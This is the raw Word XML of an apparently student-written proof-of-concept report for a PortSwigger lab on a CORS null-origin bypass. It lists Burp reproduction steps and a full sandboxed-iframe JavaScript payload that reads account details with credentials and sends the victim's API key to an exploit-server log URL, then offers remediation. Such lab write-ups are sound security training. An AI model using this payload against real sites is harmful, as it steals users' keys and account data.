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237E"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS Lab 2 — Null Origin Bypass via Sandboxed iframe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Proof of Concept Report — PortSwigger Web Security Academy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Prepared by: Aakash Singh   |   Date: May 31, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A237E" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="320" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="28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Vulnerability Information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Aakash Singh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31, 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CORS Lab 2 — Null Origin Bypass via Sandboxed iframe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PortSwigger Web Security Academy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Vulnerability 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CORS Misconfiguration — Null Origin Whitelisted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CWE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CWE-942</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="28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Impact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application whitelists the null origin in its CORS policy. An attacker can exploit this using a sandboxed iframe (which produces a null origin) to make credentialed cross-origin requests, silently exfiltrating the victim's API key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="28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Reproduction Steps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Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn Intercept OFF in Burp and log in to the lab account.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Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to My Account; in Burp HTTP history find GET /accountDetails with Access-Control-Allow-Credentials: true.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Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request to Repeater and add header Origin: null.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Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe response includes Access-Control-Allow-Origin: null — null origin is whitelisted.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Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Exploit Server, insert the sandboxed iframe payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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&lt;iframe sandbox="allow-scripts allow-top-navigation allow-forms"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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srcdoc="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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var req = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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req.onload = reqListener;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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req.open('GET','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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req.withCredentials = true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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req.send();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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function reqListener() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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location='https://YOUR-EXPLOIT-SERVER.exploit-server.net/log?key='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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+encodeURIComponent(this.responseText);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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"&gt;&lt;/iframe&gt;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Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Click 'View exploit' — the iframe produces null origin, CORS allows it, account data is stolen.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Step 7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are redirected to /log?key=... with the API key in the URL.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Step 8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Click 'Deliver exploit to victim', go to Access log, copy victim API key.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Step 9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit the API key — lab solved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="28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Evidence Screenshots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1: Login &amp; finding GET /accountDetails — Access-Control-Allow-Credentials: true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2: Origin: null sent in Repeater — Access-Control-Allow-Origin: null confirmed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3: Sandboxed iframe exploit on Exploit Server — null origin bypass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4: Exploit runs inside iframe — redirect to /log?key=...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5: Victim API key in Access log — lab solved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="2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Remediation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Never allowlist the null origin in production. Implement a strict origin allowlist with only trusted domains. Treat 'null' as an untrusted origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="4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Confidential — Prepared by Aakash Singh | Security Research POC</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="144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41bb860eb453ea4e6cded55192d8af67030201d.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c77cec397abea51178e45d56b44f26b75c822766.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/073d4be3db3a642c2e73439580ca8fc1cfe34cbf.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d3ce8cabeba494de58edc62e6359333ebac5648c.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/aeba339e82bc9605d0b668b7291a87355f4b5436.jp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2026-05-31T18:32:03.872Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-31T18:32:03.872Z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